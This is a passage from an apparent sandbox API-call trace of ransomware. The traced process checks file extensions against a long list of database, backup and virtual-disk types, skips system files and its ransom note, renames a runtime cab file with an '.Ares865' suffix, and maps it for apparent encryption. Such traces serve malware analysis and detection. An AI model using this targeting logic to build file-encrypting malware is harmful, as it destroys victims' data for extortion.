lpString2="qvd") returned -1 [0082.935] lstrlenW (lpString="rbf") returned 3 [0082.935] lstrcmpiW (lpString1="cab", lpString2="rbf") returned -1 [0082.935] lstrlenW (lpString="rctd") returned 4 [0082.935] lstrcmpiW (lpString1=".cab", lpString2="rctd") returned -1 [0082.935] lstrlenW (lpString="rod") returned 3 [0082.935] lstrcmpiW (lpString1="cab", lpString2="rod") returned -1 [0082.935] lstrlenW (lpString="rodx") returned 4 [0082.935] lstrcmpiW (lpString1=".cab", lpString2="rodx") returned -1 [0082.935] lstrlenW (lpString="rpd") returned 3 [0082.935] lstrcmpiW (lpString1="cab", lpString2="rpd") returned -1 [0082.935] lstrlenW (lpString="rsd") returned 3 [0082.935] lstrcmpiW (lpString1="cab", lpString2="rsd") returned -1 [0082.935] lstrlenW (lpString="sas7bdat") returned 8 [0082.935] lstrlenW (lpString="sbf") returned 3 [0082.935] lstrcmpiW (lpString1="cab", lpString2="sbf") returned -1 [0082.936] lstrlenW (lpString="scx") returned 3 [0082.936] lstrcmpiW (lpString1="cab", lpString2="scx") returned -1 [0082.936] lstrlenW (lpString="sdb") returned 3 [0082.936] lstrcmpiW (lpString1="cab", lpString2="sdb") returned -1 [0082.936] lstrlenW (lpString="sdc") returned 3 [0082.936] lstrcmpiW (lpString1="cab", lpString2="sdc") returned -1 [0082.936] lstrlenW (lpString="sdf") returned 3 [0082.936] lstrcmpiW (lpString1="cab", lpString2="sdf") returned -1 [0082.936] lstrlenW (lpString="sis") returned 3 [0082.936] lstrcmpiW (lpString1="cab", lpString2="sis") returned -1 [0082.936] lstrlenW (lpString="spq") returned 3 [0082.936] lstrcmpiW (lpString1="cab", lpString2="spq") returned -1 [0082.936] lstrlenW (lpString="te") returned 2 [0082.936] lstrcmpiW (lpString1="ab", lpString2="te") returned -1 [0082.936] lstrlenW (lpString="teacher") returned 7 [0082.936] lstrcmpiW (lpString1="ab1.cab", lpString2="teacher") returned -1 [0082.936] lstrlenW (lpString="tmd") returned 3 [0082.936] lstrcmpiW (lpString1="cab", lpString2="tmd") returned -1 [0082.936] lstrlenW (lpString="tps") returned 3 [0082.936] lstrcmpiW (lpString1="cab", lpString2="tps") returned -1 [0082.936] lstrlenW (lpString="trc") returned 3 [0082.936] lstrcmpiW (lpString1="cab", lpString2="trc") returned -1 [0082.936] lstrlenW (lpString="trc") returned 3 [0082.936] lstrcmpiW (lpString1="cab", lpString2="trc") returned -1 [0082.936] lstrlenW (lpString="trm") returned 3 [0082.936] lstrcmpiW (lpString1="cab", lpString2="trm") returned -1 [0082.936] lstrlenW (lpString="udb") returned 3 [0082.936] lstrcmpiW (lpString1="cab", lpString2="udb") returned -1 [0082.936] lstrlenW (lpString="udl") returned 3 [0082.936] lstrcmpiW (lpString1="cab", lpString2="udl") returned -1 [0082.936] lstrlenW (lpString="usr") returned 3 [0082.936] lstrcmpiW (lpString1="cab", lpString2="usr") returned -1 [0082.936] lstrlenW (lpString="v12") returned 3 [0082.936] lstrcmpiW (lpString1="cab", lpString2="v12") returned -1 [0082.936] lstrlenW (lpString="vis") returned 3 [0082.936] lstrcmpiW (lpString1="cab", lpString2="vis") returned -1 [0082.936] lstrlenW (lpString="vpd") returned 3 [0082.937] lstrcmpiW (lpString1="cab", lpString2="vpd") returned -1 [0082.937] lstrlenW (lpString="vvv") returned 3 [0082.937] lstrcmpiW (lpString1="cab", lpString2="vvv") returned -1 [0082.937] lstrlenW (lpString="wdb") returned 3 [0082.937] lstrcmpiW (lpString1="cab", lpString2="wdb") returned -1 [0082.937] lstrlenW (lpString="wmdb") returned 4 [0082.937] lstrcmpiW (lpString1=".cab", lpString2="wmdb") returned -1 [0082.937] lstrlenW (lpString="wrk") returned 3 [0082.937] lstrcmpiW (lpString1="cab", lpString2="wrk") returned -1 [0082.937] lstrlenW (lpString="xdb") returned 3 [0082.937] lstrcmpiW (lpString1="cab", lpString2="xdb") returned -1 [0082.937] lstrlenW (lpString="xld") returned 3 [0082.937] lstrcmpiW (lpString1="cab", lpString2="xld") returned -1 [0082.937] lstrlenW (lpString="xmlff") returned 5 [0082.937] lstrcmpiW (lpString1="1.cab", lpString2="xmlff") returned -1 [0082.937] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab.Ares865") returned 129 [0082.937] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab.Ares865" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab.ares865"), dwFlags=0x1) returned 1 [0082.938] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab.Ares865" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0082.938] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=997054) returned 1 [0082.938] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0082.938] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0082.939] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0082.939] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0082.939] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0082.940] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0082.940] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xf39c0, lpName=0x0) returned 0x15c [0082.941] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf39c0) returned 0xdd0000 [0082.989] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0082.990] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0082.990] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0082.990] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0082.990] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0082.990] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0082.990] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0082.990] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0082.990] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0082.990] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0082.990] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0082.990] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0082.990] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0082.990] UnmapViewOfFile (lpBaseAddress=0xdd0000) returned 1 [0082.999] CloseHandle (hObject=0x15c) returned 1 [0082.999] CloseHandle (hObject=0x118) returned 1 [0082.999] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0082.999] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0082.999] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0083.004] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c27d800, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c27d800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0083.004] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0083.004] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50cc6500, ftCreationTime.dwHighDateTime=0x1cf3dd3, ftLastAccessTime.dwLowDateTime=0x50cc6500, ftLastAccessTime.dwHighDateTime=0x1cf3dd3, ftLastWriteTime.dwLowDateTime=0x50cc6500, ftLastWriteTime.dwHighDateTime=0x1cf3dd3, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vc_runtimeMinimum_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0083.004] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.004] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="aoldtz.exe") returned 1 [0083.004] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2=".") returned 1 [0083.004] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="..") returned 1 [0083.004] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="windows") returned -1 [0083.004] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="bootmgr") returned 1 [0083.004] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="temp") returned 1 [0083.004] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="pagefile.sys") returned 1 [0083.004] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="boot") returned 1 [0083.004] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="ids.txt") returned 1 [0083.004] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="ntuser.dat") returned 1 [0083.004] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="perflogs") returned 1 [0083.004] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="MSBuild") returned 1 [0083.005] lstrlenW (lpString="vc_runtimeMinimum_x86.msi") returned 25 [0083.005] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned 121 [0083.005] lstrcpyW (in: lpString1=0x2cce4e2, lpString2="vc_runtimeMinimum_x86.msi" | out: lpString1="vc_runtimeMinimum_x86.msi") returned="vc_runtimeMinimum_x86.msi" [0083.005] lstrlenW (lpString="vc_runtimeMinimum_x86.msi") returned 25 [0083.005] lstrlenW (lpString="Ares865") returned 7 [0083.005] lstrcmpiW (lpString1="x86.msi", lpString2="Ares865") returned 1 [0083.005] lstrlenW (lpString=".dll") returned 4 [0083.005] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2=".dll") returned 1 [0083.005] lstrlenW (lpString=".lnk") returned 4 [0083.005] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2=".lnk") returned 1 [0083.005] lstrlenW (lpString=".ini") returned 4 [0083.005] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2=".ini") returned 1 [0083.005] lstrlenW (lpString=".sys") returned 4 [0083.005] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2=".sys") returned 1 [0083.005] lstrlenW (lpString="vc_runtimeMinimum_x86.msi") returned 25 [0083.005] lstrlenW (lpString="bak") returned 3 [0083.005] lstrcmpiW (lpString1="msi", lpString2="bak") returned 1 [0083.005] lstrlenW (lpString="ba_") returned 3 [0083.005] lstrcmpiW (lpString1="msi", lpString2="ba_") returned 1 [0083.005] lstrlenW (lpString="dbb") returned 3 [0083.005] lstrcmpiW (lpString1="msi", lpString2="dbb") returned 1 [0083.005] lstrlenW (lpString="vmdk") returned 4 [0083.005] lstrcmpiW (lpString1=".msi", lpString2="vmdk") returned -1 [0083.005] lstrlenW (lpString="rar") returned 3 [0083.005] lstrcmpiW (lpString1="msi", lpString2="rar") returned -1 [0083.005] lstrlenW (lpString="zip") returned 3 [0083.005] lstrcmpiW (lpString1="msi", lpString2="zip") returned -1 [0083.005] lstrlenW (lpString="tgz") returned 3 [0083.005] lstrcmpiW (lpString1="msi", lpString2="tgz") returned -1 [0083.005] lstrlenW (lpString="vbox") returned 4 [0083.005] lstrcmpiW (lpString1=".msi", lpString2="vbox") returned -1 [0083.005] lstrlenW (lpString="vdi") returned 3 [0083.005] lstrcmpiW (lpString1="msi", lpString2="vdi") returned -1 [0083.005] lstrlenW (lpString="vhd") returned 3 [0083.005] lstrcmpiW (lpString1="msi", lpString2="vhd") returned -1 [0083.005] lstrlenW (lpString="vhdx") returned 4 [0083.006] lstrcmpiW (lpString1=".msi", lpString2="vhdx") returned -1 [0083.006] lstrlenW (lpString="avhd") returned 4 [0083.006] lstrcmpiW (lpString1=".msi", lpString2="avhd") returned -1 [0083.006] lstrlenW (lpString="db") returned 2 [0083.006] lstrcmpiW (lpString1="si", lpString2="db") returned 1 [0083.006] lstrlenW (lpString="db2") returned 3 [0083.006] lstrcmpiW (lpString1="msi", lpString2="db2") returned 1 [0083.006] lstrlenW (lpString="db3") returned 3 [0083.006] lstrcmpiW (lpString1="msi", lpString2="db3") returned 1 [0083.006] lstrlenW (lpString="dbf") returned 3 [0083.006] lstrcmpiW (lpString1="msi", lpString2="dbf") returned 1 [0083.006] lstrlenW (lpString="mdf") returned 3 [0083.006] lstrcmpiW (lpString1="msi", lpString2="mdf") returned 1 [0083.006] lstrlenW (lpString="mdb") returned 3 [0083.006] lstrcmpiW (lpString1="msi", lpString2="mdb") returned 1 [0083.006] lstrlenW (lpString="sql") returned 3 [0083.006] lstrcmpiW (lpString1="msi", lpString2="sql") returned -1 [0083.006] lstrlenW (lpString="sqlite") returned 6 [0083.006] lstrcmpiW (lpString1="86.msi", lpString2="sqlite") returned -1 [0083.006] lstrlenW (lpString="sqlite3") returned 7 [0083.006] lstrcmpiW (lpString1="x86.msi", lpString2="sqlite3") returned 1 [0083.006] lstrlenW (lpString="sqlitedb") returned 8 [0083.006] lstrcmpiW (lpString1="_x86.msi", lpString2="sqlitedb") returned -1 [0083.006] lstrlenW (lpString="xml") returned 3 [0083.006] lstrcmpiW (lpString1="msi", lpString2="xml") returned -1 [0083.006] lstrlenW (lpString="$er") returned 3 [0083.006] lstrcmpiW (lpString1="msi", lpString2="$er") returned 1 [0083.006] lstrlenW (lpString="4dd") returned 3 [0083.006] lstrcmpiW (lpString1="msi", lpString2="4dd") returned 1 [0083.006] lstrlenW (lpString="4dl") returned 3 [0083.006] lstrcmpiW (lpString1="msi", lpString2="4dl") returned 1 [0083.006] lstrlenW (lpString="^^^") returned 3 [0083.006] lstrcmpiW (lpString1="msi", lpString2="^^^") returned 1 [0083.006] lstrlenW (lpString="abs") returned 3 [0083.007] lstrcmpiW (lpString1="msi", lpString2="abs") returned 1 [0083.007] lstrlenW (lpString="abx") returned 3 [0083.007] lstrcmpiW (lpString1="msi", lpString2="abx") returned 1 [0083.007] lstrlenW (lpString="accdb") returned 5 [0083.007] lstrcmpiW (lpString1="6.msi", lpString2="accdb") returned -1 [0083.007] lstrlenW (lpString="accdc") returned 5 [0083.007] lstrcmpiW (lpString1="6.msi", lpString2="accdc") returned -1 [0083.007] lstrlenW (lpString="accde") returned 5 [0083.007] lstrcmpiW (lpString1="6.msi", lpString2="accde") returned -1 [0083.007] lstrlenW (lpString="accdr") returned 5 [0083.007] lstrcmpiW (lpString1="6.msi", lpString2="accdr") returned -1 [0083.007] lstrlenW (lpString="accdt") returned 5 [0083.007] lstrcmpiW (lpString1="6.msi", lpString2="accdt") returned -1 [0083.007] lstrlenW (lpString="accdw") returned 5 [0083.007] lstrcmpiW (lpString1="6.msi", lpString2="accdw") returned -1 [0083.007] lstrlenW (lpString="accft") returned 5 [0083.007] lstrcmpiW (lpString1="6.msi", lpString2="accft") returned -1 [0083.007] lstrlenW (lpString="adb") returned 3 [0083.007] lstrcmpiW (lpString1="msi", lpString2="adb") returned 1 [0083.007] lstrlenW (lpString="adb") returned 3 [0083.007] lstrcmpiW (lpString1="msi", lpString2="adb") returned 1 [0083.007] lstrlenW (lpString="ade") returned 3 [0083.007] lstrcmpiW (lpString1="msi", lpString2="ade") returned 1 [0083.007] lstrlenW (lpString="adf") returned 3 [0083.007] lstrcmpiW (lpString1="msi", lpString2="adf") returned 1 [0083.007] lstrlenW (lpString="adn") returned 3 [0083.007] lstrcmpiW (lpString1="msi", lpString2="adn") returned 1 [0083.007] lstrlenW (lpString="adp") returned 3 [0083.007] lstrcmpiW (lpString1="msi", lpString2="adp") returned 1 [0083.007] lstrlenW (lpString="alf") returned 3 [0083.007] lstrcmpiW (lpString1="msi", lpString2="alf") returned 1 [0083.007] lstrlenW (lpString="ask") returned 3 [0083.007] lstrcmpiW (lpString1="msi", lpString2="ask") returned 1 [0083.007] lstrlenW (lpString="btr") returned 3 [0083.007] lstrcmpiW (lpString1="msi", lpString2="btr") returned 1 [0083.007] lstrlenW (lpString="cat") returned 3 [0083.008] lstrcmpiW (lpString1="msi", lpString2="cat") returned 1 [0083.008] lstrlenW (lpString="cdb") returned 3 [0083.008] lstrcmpiW (lpString1="msi", lpString2="cdb") returned 1 [0083.008] lstrlenW (lpString="ckp") returned 3 [0083.008] lstrcmpiW (lpString1="msi", lpString2="ckp") returned 1 [0083.008] lstrlenW (lpString="cma") returned 3 [0083.008] lstrcmpiW (lpString1="msi", lpString2="cma") returned 1 [0083.008] lstrlenW (lpString="cpd") returned 3 [0083.008] lstrcmpiW (lpString1="msi", lpString2="cpd") returned 1 [0083.008] lstrlenW (lpString="dacpac") returned 6 [0083.008] lstrcmpiW (lpString1="86.msi", lpString2="dacpac") returned -1 [0083.008] lstrlenW (lpString="dad") returned 3 [0083.008] lstrcmpiW (lpString1="msi", lpString2="dad") returned 1 [0083.008] lstrlenW (lpString="dadiagrams") returned 10 [0083.008] lstrcmpiW (lpString1="um_x86.msi", lpString2="dadiagrams") returned 1 [0083.008] lstrlenW (lpString="daschema") returned 8 [0083.008] lstrcmpiW (lpString1="_x86.msi", lpString2="daschema") returned -1 [0083.008] lstrlenW (lpString="db-journal") returned 10 [0083.008] lstrcmpiW (lpString1="um_x86.msi", lpString2="db-journal") returned 1 [0083.008] lstrlenW (lpString="db-shm") returned 6 [0083.008] lstrcmpiW (lpString1="86.msi", lpString2="db-shm") returned -1 [0083.008] lstrlenW (lpString="db-wal") returned 6 [0083.008] lstrcmpiW (lpString1="86.msi", lpString2="db-wal") returned -1 [0083.008] lstrlenW (lpString="dbc") returned 3 [0083.008] lstrcmpiW (lpString1="msi", lpString2="dbc") returned 1 [0083.008] lstrlenW (lpString="dbs") returned 3 [0083.008] lstrcmpiW (lpString1="msi", lpString2="dbs") returned 1 [0083.008] lstrlenW (lpString="dbt") returned 3 [0083.008] lstrcmpiW (lpString1="msi", lpString2="dbt") returned 1 [0083.008] lstrlenW (lpString="dbv") returned 3 [0083.008] lstrcmpiW (lpString1="msi", lpString2="dbv") returned 1 [0083.008] lstrlenW (lpString="dbx") returned 3 [0083.008] lstrcmpiW (lpString1="msi", lpString2="dbx") returned 1 [0083.008] lstrlenW (lpString="dcb") returned 3 [0083.008] lstrcmpiW (lpString1="msi", lpString2="dcb") returned 1 [0083.008] lstrlenW (lpString="dct") returned 3 [0083.008] lstrcmpiW (lpString1="msi", lpString2="dct") returned 1 [0083.008] lstrlenW (lpString="dcx") returned 3 [0083.009] lstrcmpiW (lpString1="msi", lpString2="dcx") returned 1 [0083.009] lstrlenW (lpString="ddl") returned 3 [0083.009] lstrcmpiW (lpString1="msi", lpString2="ddl") returned 1 [0083.009] lstrlenW (lpString="dlis") returned 4 [0083.009] lstrcmpiW (lpString1=".msi", lpString2="dlis") returned -1 [0083.009] lstrlenW (lpString="dp1") returned 3 [0083.009] lstrcmpiW (lpString1="msi", lpString2="dp1") returned 1 [0083.009] lstrlenW (lpString="dqy") returned 3 [0083.009] lstrcmpiW (lpString1="msi", lpString2="dqy") returned 1 [0083.009] lstrlenW (lpString="dsk") returned 3 [0083.009] lstrcmpiW (lpString1="msi", lpString2="dsk") returned 1 [0083.009] lstrlenW (lpString="dsn") returned 3 [0083.009] lstrcmpiW (lpString1="msi", lpString2="dsn") returned 1 [0083.009] lstrlenW (lpString="dtsx") returned 4 [0083.009] lstrcmpiW (lpString1=".msi", lpString2="dtsx") returned -1 [0083.009] lstrlenW (lpString="dxl") returned 3 [0083.009] lstrcmpiW (lpString1="msi", lpString2="dxl") returned 1 [0083.009] lstrlenW (lpString="eco") returned 3 [0083.009] lstrcmpiW (lpString1="msi", lpString2="eco") returned 1 [0083.009] lstrlenW (lpString="ecx") returned 3 [0083.009] lstrcmpiW (lpString1="msi", lpString2="ecx") returned 1 [0083.009] lstrlenW (lpString="edb") returned 3 [0083.009] lstrcmpiW (lpString1="msi", lpString2="edb") returned 1 [0083.009] lstrlenW (lpString="epim") returned 4 [0083.009] lstrcmpiW (lpString1=".msi", lpString2="epim") returned -1 [0083.009] lstrlenW (lpString="fcd") returned 3 [0083.009] lstrcmpiW (lpString1="msi", lpString2="fcd") returned 1 [0083.009] lstrlenW (lpString="fdb") returned 3 [0083.009] lstrcmpiW (lpString1="msi", lpString2="fdb") returned 1 [0083.009] lstrlenW (lpString="fic") returned 3 [0083.009] lstrcmpiW (lpString1="msi", lpString2="fic") returned 1 [0083.009] lstrlenW (lpString="flexolibrary") returned 12 [0083.009] lstrcmpiW (lpString1="imum_x86.msi", lpString2="flexolibrary") returned 1 [0083.009] lstrlenW (lpString="fm5") returned 3 [0083.009] lstrcmpiW (lpString1="msi", lpString2="fm5") returned 1 [0083.009] lstrlenW (lpString="fmp") returned 3 [0083.010] lstrcmpiW (lpString1="msi", lpString2="fmp") returned 1 [0083.010] lstrlenW (lpString="fmp12") returned 5 [0083.010] lstrcmpiW (lpString1="6.msi", lpString2="fmp12") returned -1 [0083.010] lstrlenW (lpString="fmpsl") returned 5 [0083.010] lstrcmpiW (lpString1="6.msi", lpString2="fmpsl") returned -1 [0083.010] lstrlenW (lpString="fol") returned 3 [0083.010] lstrcmpiW (lpString1="msi", lpString2="fol") returned 1 [0083.010] lstrlenW (lpString="fp3") returned 3 [0083.010] lstrcmpiW (lpString1="msi", lpString2="fp3") returned 1 [0083.010] lstrlenW (lpString="fp4") returned 3 [0083.010] lstrcmpiW (lpString1="msi", lpString2="fp4") returned 1 [0083.010] lstrlenW (lpString="fp5") returned 3 [0083.010] lstrcmpiW (lpString1="msi", lpString2="fp5") returned 1 [0083.010] lstrlenW (lpString="fp7") returned 3 [0083.010] lstrcmpiW (lpString1="msi", lpString2="fp7") returned 1 [0083.010] lstrlenW (lpString="fpt") returned 3 [0083.010] lstrcmpiW (lpString1="msi", lpString2="fpt") returned 1 [0083.010] lstrlenW (lpString="frm") returned 3 [0083.010] lstrcmpiW (lpString1="msi", lpString2="frm") returned 1 [0083.010] lstrlenW (lpString="gdb") returned 3 [0083.010] lstrcmpiW (lpString1="msi", lpString2="gdb") returned 1 [0083.010] lstrlenW (lpString="gdb") returned 3 [0083.010] lstrcmpiW (lpString1="msi", lpString2="gdb") returned 1 [0083.010] lstrlenW (lpString="grdb") returned 4 [0083.010] lstrcmpiW (lpString1=".msi", lpString2="grdb") returned -1 [0083.010] lstrlenW (lpString="gwi") returned 3 [0083.010] lstrcmpiW (lpString1="msi", lpString2="gwi") returned 1 [0083.010] lstrlenW (lpString="hdb") returned 3 [0083.010] lstrcmpiW (lpString1="msi", lpString2="hdb") returned 1 [0083.010] lstrlenW (lpString="his") returned 3 [0083.010] lstrcmpiW (lpString1="msi", lpString2="his") returned 1 [0083.010] lstrlenW (lpString="ib") returned 2 [0083.010] lstrcmpiW (lpString1="si", lpString2="ib") returned 1 [0083.010] lstrlenW (lpString="idb") returned 3 [0083.010] lstrcmpiW (lpString1="msi", lpString2="idb") returned 1 [0083.010] lstrlenW (lpString="ihx") returned 3 [0083.010] lstrcmpiW (lpString1="msi", lpString2="ihx") returned 1 [0083.011] lstrlenW (lpString="itdb") returned 4 [0083.011] lstrcmpiW (lpString1=".msi", lpString2="itdb") returned -1 [0083.011] lstrlenW (lpString="itw") returned 3 [0083.011] lstrcmpiW (lpString1="msi", lpString2="itw") returned 1 [0083.011] lstrlenW (lpString="jet") returned 3 [0083.011] lstrcmpiW (lpString1="msi", lpString2="jet") returned 1 [0083.011] lstrlenW (lpString="jtx") returned 3 [0083.011] lstrcmpiW (lpString1="msi", lpString2="jtx") returned 1 [0083.011] lstrlenW (lpString="kdb") returned 3 [0083.011] lstrcmpiW (lpString1="msi", lpString2="kdb") returned 1 [0083.011] lstrlenW (lpString="kexi") returned 4 [0083.011] lstrcmpiW (lpString1=".msi", lpString2="kexi") returned -1 [0083.011] lstrlenW (lpString="kexic") returned 5 [0083.011] lstrcmpiW (lpString1="6.msi", lpString2="kexic") returned -1 [0083.011] lstrlenW (lpString="kexis") returned 5 [0083.011] lstrcmpiW (lpString1="6.msi", lpString2="kexis") returned -1 [0083.011] lstrlenW (lpString="lgc") returned 3 [0083.011] lstrcmpiW (lpString1="msi", lpString2="lgc") returned 1 [0083.011] lstrlenW (lpString="lwx") returned 3 [0083.011] lstrcmpiW (lpString1="msi", lpString2="lwx") returned 1 [0083.011] lstrlenW (lpString="maf") returned 3 [0083.011] lstrcmpiW (lpString1="msi", lpString2="maf") returned 1 [0083.011] lstrlenW (lpString="maq") returned 3 [0083.011] lstrcmpiW (lpString1="msi", lpString2="maq") returned 1 [0083.011] lstrlenW (lpString="mar") returned 3 [0083.011] lstrcmpiW (lpString1="msi", lpString2="mar") returned 1 [0083.011] lstrlenW (lpString="marshal") returned 7 [0083.011] lstrcmpiW (lpString1="x86.msi", lpString2="marshal") returned 1 [0083.011] lstrlenW (lpString="mas") returned 3 [0083.011] lstrcmpiW (lpString1="msi", lpString2="mas") returned 1 [0083.011] lstrlenW (lpString="mav") returned 3 [0083.011] lstrcmpiW (lpString1="msi", lpString2="mav") returned 1 [0083.011] lstrlenW (lpString="maw") returned 3 [0083.011] lstrcmpiW (lpString1="msi", lpString2="maw") returned 1 [0083.011] lstrlenW (lpString="mdbhtml") returned 7 [0083.011] lstrcmpiW (lpString1="x86.msi", lpString2="mdbhtml") returned 1 [0083.011] lstrlenW (lpString="mdn") returned 3 [0083.012] lstrcmpiW (lpString1="msi", lpString2="mdn") returned 1 [0083.012] lstrlenW (lpString="mdt") returned 3 [0083.012] lstrcmpiW (lpString1="msi", lpString2="mdt") returned 1 [0083.012] lstrlenW (lpString="mfd") returned 3 [0083.012] lstrcmpiW (lpString1="msi", lpString2="mfd") returned 1 [0083.012] lstrlenW (lpString="mpd") returned 3 [0083.012] lstrcmpiW (lpString1="msi", lpString2="mpd") returned 1 [0083.012] lstrlenW (lpString="mrg") returned 3 [0083.012] lstrcmpiW (lpString1="msi", lpString2="mrg") returned 1 [0083.012] lstrlenW (lpString="mud") returned 3 [0083.012] lstrcmpiW (lpString1="msi", lpString2="mud") returned -1 [0083.012] lstrlenW (lpString="mwb") returned 3 [0083.012] lstrcmpiW (lpString1="msi", lpString2="mwb") returned -1 [0083.012] lstrlenW (lpString="myd") returned 3 [0083.012] lstrcmpiW (lpString1="msi", lpString2="myd") returned -1 [0083.012] lstrlenW (lpString="ndf") returned 3 [0083.012] lstrcmpiW 